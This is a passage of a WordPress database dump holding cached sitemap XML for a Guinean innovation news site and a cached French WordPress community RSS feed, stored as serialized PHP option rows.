<loc>https://guineeinnove.nimbasolution.com/category-sitemap.xml</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</sitemap>\n</sitemapindex>\";}}','no'),(2451,'_transient_timeout_yst_sm_category_1:47KvK_4OR9o','1512787451','no'),(2452,'_transient_yst_sm_category_1:47KvK_4OR9o','C:24:\"WPSEO_Sitemap_Cache_Data\":1528:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:1480:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/agriculture/</loc>\n		<lastmod>2017-11-20T16:45:30+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/autre/</loc>\n		<lastmod>2017-11-22T10:36:49+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/culture/</loc>\n		<lastmod>2017-11-01T11:49:32+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/economie/</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/sante/</loc>\n		<lastmod>2017-11-06T10:05:03+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/societe/</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/sport/</loc>\n		<lastmod>2017-11-01T13:00:44+00:00</lastmod>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/category/technologie/</loc>\n		<lastmod>2017-11-06T10:05:03+00:00</lastmod>\n	</url>\n</urlset>\";}}','no'),(2461,'_transient_timeout_yst_sm_post_1:47KvK_fcdQ','1512798589','no'),(2462,'_transient_yst_sm_post_1:47KvK_fcdQ','C:24:\"WPSEO_Sitemap_Cache_Data\":10965:{a:2:{s:6:\"status\";s:2:\"ok\";s:3:\"xml\";s:10916:\"<urlset xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:image=\"http://www.google.com/schemas/sitemap-image/1.1\" xsi:schemaLocation=\"http://www.sitemaps.org/schemas/sitemap/0.9 http://www.sitemaps.org/schemas/sitemap/0.9/sitemap.xsd http://www.google.com/schemas/sitemap-image/1.1 http://www.google.com/schemas/sitemap-image/1.1/sitemap-image.xsd\" xmlns=\"http://www.sitemaps.org/schemas/sitemap/0.9\">\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/24/un-architecte-guineen-cree-un-concept-de-maison-autonome-en-energie/</loc>\n		<lastmod>2017-10-31T15:39:03+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/moustapha.jpg</image:loc>\n			<image:title><![CDATA[moustapha]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/architecte-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/4-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/3.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/2-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-768x432.jpg</image:loc>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/6-1-768x432.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/alpha-oumar-gagne-le-concours-national-de-dessin-et-de-peinture-organise-par-la-delegation-de-lunion-europeenne-en-guinee/</loc>\n		<lastmod>2017-11-01T11:49:32+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Culture.jpg</image:loc>\n			<image:title><![CDATA[Culture]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/jawards-guinee-la-structure-intelligentsia-guinee-lance-la-1ere-edition/</loc>\n		<lastmod>2017-11-01T11:57:56+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Jawards.jpg</image:loc>\n			<image:title><![CDATA[Jawards]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/sekou-lamine-coyah-bangoura/</loc>\n		<lastmod>2017-11-01T12:04:09+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sekou.jpg</image:loc>\n			<image:title><![CDATA[sekou]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/kerfalla-camara-cree-le-cafe-ziama-macenta/</loc>\n		<lastmod>2017-11-01T12:18:58+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/cafe_ziama_macenta-679x380.jpg</image:loc>\n			<image:title><![CDATA[cafe_ziama_macenta-679x380]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ziama-300x124.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/mamoudou-diallo-createur-de-quizz224/</loc>\n		<lastmod>2017-11-01T12:34:15+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Mood.jpg</image:loc>\n			<image:title><![CDATA[Mood]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/unnamed.png</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/une-plateforme-dinformations-sur-les-procedures-administratives/</loc>\n		<lastmod>2017-11-01T12:36:32+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Yali-Guin%C3%A9e.jpg</image:loc>\n			<image:title><![CDATA[Yali-Guinée]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/ocp-2.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/une-marque-de-vetements-de-sport-en-guinee/</loc>\n		<lastmod>2017-11-01T13:00:44+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/AfricaPostNews-Guin%C3%A9e-vetements-de-sport.jpg</image:loc>\n			<image:title><![CDATA[AfricaPostNews-Guinée-vetements-de-sport]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/un-journal-televise-rappe-par-hadafo-media-en-guinee/</loc>\n		<lastmod>2017-11-01T13:05:15+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/JTR.jpg</image:loc>\n			<image:title><![CDATA[JTR]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/24/electricite-un-homme-invente-un-micro-barrage-de-9kva-dans-une-localite-de-gueckedou/</loc>\n		<lastmod>2017-11-01T13:17:01+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943.jpg</image:loc>\n			<image:title><![CDATA[_97723064_img_20170730_131943]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/97723064_img_20170730_131943.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/fatoumata-cherif-cree-plateforme-de-medias-ligne-developpement-durable/</loc>\n		<lastmod>2017-11-01T13:49:37+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/fc.jpg</image:loc>\n			<image:title><![CDATA[fc]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/er.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/ibrahima-soumano-cree-plateforme-universelle-de-recharges-telephoniques/</loc>\n		<lastmod>2017-11-01T14:35:33+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sen.jpg</image:loc>\n			<image:title><![CDATA[sen]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/sedd.png</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/lemine-camara-utilise-feuilles-de-kola-regenerer-terres-infertiles/</loc>\n		<lastmod>2017-11-01T14:59:38+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/plantation5_0.jpg</image:loc>\n			<image:title><![CDATA[plantation5_0]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/01/alpha-amadou-diallo-cree-application-aider-compatriotes-a-se-deplacer-plus-facilement/</loc>\n		<lastmod>2017-11-01T15:14:15+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/aad.jpg</image:loc>\n			<image:title><![CDATA[aad]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/24/diallo-thierno-mamadou-djan-concepteur-dune-maquette-dun-feu-de-croisement-intelligent/</loc>\n		<lastmod>2017-11-01T16:04:51+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sss.jpg</image:loc>\n			<image:title><![CDATA[sss]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/feu.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/alpha-mamadou-diallo-cree-une-plateforme-pour-faciliter-lacces-au-livre/</loc>\n		<lastmod>2017-11-02T15:10:32+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/alpha.jpg</image:loc>\n			<image:title><![CDATA[alpha]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/26/sambako-et-sa-petite-revolution-agricole/</loc>\n		<lastmod>2017-11-06T09:31:08+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/sb.jpg</image:loc>\n			<image:title><![CDATA[sb]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/10/30/fatou-thithi-camara-creee-un-carnet-de-sante-digitale/</loc>\n		<lastmod>2017-11-06T10:05:03+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/Fatou.jpg</image:loc>\n			<image:title><![CDATA[Fatou]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/10/poes.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/08/guineen-publie-formule-mathematique-met-fin-a-vielle-recherche-de-plus-de-2000-ans/</loc>\n		<lastmod>2017-11-08T12:24:25+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/hawing.jpg</image:loc>\n			<image:title><![CDATA[hawing]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/20/bhoye-bah-cree-marque-de-cafe-arabica-100-bio/</loc>\n		<lastmod>2017-11-20T16:45:30+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/Bhoye.jpg</image:loc>\n			<image:title><![CDATA[Bhoye]]></image:title>\n		</image:image>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/eee.jpg</image:loc>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/22/kady-tounkara-aide-guineens-a-trouver-partenaire-mariage/</loc>\n		<lastmod>2017-11-22T10:36:49+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/kady-tounkara-1068x801-696x522.jpg</image:loc>\n			<image:title><![CDATA[kady-tounkara-1068x801-696x522]]></image:title>\n		</image:image>\n	</url>\n	<url>\n		<loc>https://guineeinnove.nimbasolution.com/2017/11/25/__trashed-4/</loc>\n		<lastmod>2017-11-27T11:36:37+00:00</lastmod>\n		<image:image>\n			<image:loc>https://guineeinnove.nimbasolution.com/wp-content/uploads/2017/11/received_1606639512733963-1.jpeg</image:loc>\n			<image:title><![CDATA[OCP]]></image:title>\n		</image:image>\n	</url>\n</urlset>\";}}','no'),(2463,'_transient_timeout_elementor_remote_info_api_data_1.8.0','1512762151','no'),(2464,'_transient_elementor_remote_info_api_data_1.8.0','a:2:{s:9:\"timestamp\";i:1512718951;s:14:\"upgrade_notice\";a:2:{s:7:\"version\";s:5:\"1.5.0\";s:7:\"message\";s:0:\"\";}}','no'),(2465,'_site_transient_timeout_community-events-d91e555fff5d473a0f4d65e1d05ff461','1512762162','no'),(2466,'_site_transient_community-events-d91e555fff5d473a0f4d65e1d05ff461','a:2:{s:8:\"location\";a:1:{s:2:\"ip\";s:11:\"41.223.49.0\";}s:6:\"events\";a:0:{}}','no'),(2467,'_transient_timeout_feed_66a70e9599b658d5cc038e8074597e7c','1512762162','no'),(2468,'_transient_feed_66a70e9599b658d5cc038e8074597e7c','a:4:{s:5:\"child\";a:1:{s:0:\"\";a:1:{s:3:\"rss\";a:1:{i:0;a:6:{s:4:\"data\";s:3:\"\n\n\n\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:7:\"version\";s:3:\"2.0\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:1:{s:0:\"\";a:1:{s:7:\"channel\";a:1:{i:0;a:6:{s:4:\"data\";s:49:\"\n	\n	\n	\n	\n	\n	\n	\n	\n	\n	\n		\n		\n		\n		\n		\n		\n		\n		\n		\n	\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:6:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:16:\"https://wpfr.net\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Site officiel de la communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:13:\"lastBuildDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Fri, 08 Dec 2017 07:26:15 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"language\";a:1:{i:0;a:5:{s:4:\"data\";s:5:\"fr-FR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"item\";a:10:{i:0;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:56:\"Certification WordPress par WPFR, appel à contributions\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/UUGDJmDzVjE/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:75:\"https://wpfr.net/certification-wordpress-wpfr-appel-contributions/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 19 Oct 2017 06:46:49 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:2:{i:0;a:5:{s:4:\"data\";s:16:\"Association WPFR\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1931227\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1508:\"Le chantier lié à la mise en place d&#8217;une certification WordPress accessible via le Compte Personnel de Formation (CPF) et enregistré auprès du Registre National des Certifications Professionnelles (RNCP) est en marche. Ce dernier est mené par Maxime Bernard-Jacquet avec nous l&#8217;espérons des résultats concrets pour 2018. Cette mission a été relancée lors de la<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=UUGDJmDzVjE:jTMHK5CfDEs:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=UUGDJmDzVjE:jTMHK5CfDEs:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=UUGDJmDzVjE:jTMHK5CfDEs:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/UUGDJmDzVjE\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:15:\"Aurélien Denis\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:71:\"https://wpfr.net/certification-wordpress-wpfr-appel-contributions/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"5\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:66:\"https://wpfr.net/certification-wordpress-wpfr-appel-contributions/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:1;a:6:{s:4:\"data\";s:45:\"\n		\n		\n		\n		\n		\n				\n		\n		\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:61:\"Le 30 septembre, c’est le WordPress Translation Day 2017 !\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:67:\"http://feedproxy.google.com/~r/WordpressFrancophone/~3/PgJgl5KXQwk/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:81:\"https://wpfr.net/le-30-septembre-cest-le-wordpress-translation-day-2017/#comments\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Tue, 12 Sep 2017 12:03:43 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:8:\"category\";a:4:{i:0;a:5:{s:4:\"data\";s:4:\"Blog\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:1;a:5:{s:4:\"data\";s:11:\"Evènements\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:2;a:5:{s:4:\"data\";s:11:\"communauté\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}i:3;a:5:{s:4:\"data\";s:10:\"traduction\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"https://wpfr.net/?p=1883236\";s:7:\"attribs\";a:1:{s:0:\"\";a:1:{s:11:\"isPermaLink\";s:5:\"false\";}}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:1488:\"Le troisième WordPress Translation Day aura lieu le 30 septembre 2017 ! Le 30/09 se déroulera un marathon mondial de 24 heures dédié à la traduction et à la localisation de la plate-forme WordPress et de son écosystème : thèmes, extensions, applications… Organisé par l&#8217;équipe WordPress Polyglots dont la mission est de traduire WordPress dans<div class=\"btn btn-default read-more text-uppercase\">Lire la suite <span class=\"meta-nav\"><i class=\"fa fa-caret-right\"></i></span></div><div class=\"feedflare\">\n<a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:yIl2AUoC8zA\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=yIl2AUoC8zA\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:V_sGLiPBpWU\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=PgJgl5KXQwk:7QgDYesvNPg:V_sGLiPBpWU\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:qj6IDK7rITs\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?d=qj6IDK7rITs\" border=\"0\"></img></a> <a href=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?a=PgJgl5KXQwk:7QgDYesvNPg:gIN9vFwOqvQ\"><img src=\"http://feeds.feedburner.com/~ff/WordpressFrancophone?i=PgJgl5KXQwk:7QgDYesvNPg:gIN9vFwOqvQ\" border=\"0\"></img></a>\n</div><img src=\"http://feeds.feedburner.com/~r/WordpressFrancophone/~4/PgJgl5KXQwk\" height=\"1\" width=\"1\" alt=\"\"/>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:9:\"Jb Audras\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:36:\"http://wellformedweb.org/CommentAPI/\";a:1:{s:10:\"commentRss\";a:1:{i:0;a:5:{s:4:\"data\";s:77:\"https://wpfr.net/le-30-septembre-cest-le-wordpress-translation-day-2017/feed/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:38:\"http://purl.org/rss/1.0/modules/slash/\";a:1:{s:8:\"comments\";a:1:{i:0;a:5:{s:4:\"data\";s:1:\"3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:42:\"http://rssnamespace.org/feedburner/ext/1.0\";a:1:{s:8:\"origLink\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"https://wpfr.net/le-30-septembre-cest-le-wordpress-translation-day-2017/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:2;a:6:{s:4:\"data\";s:39:\"\n		\n		\n		\n		\n		\n				\n		\n\n		\n		\n		\n		\n		\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:5:{s:0:\"\";a:7:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:73:\"#GEN5, l’évènement numérique du grand-Est où l’on cause 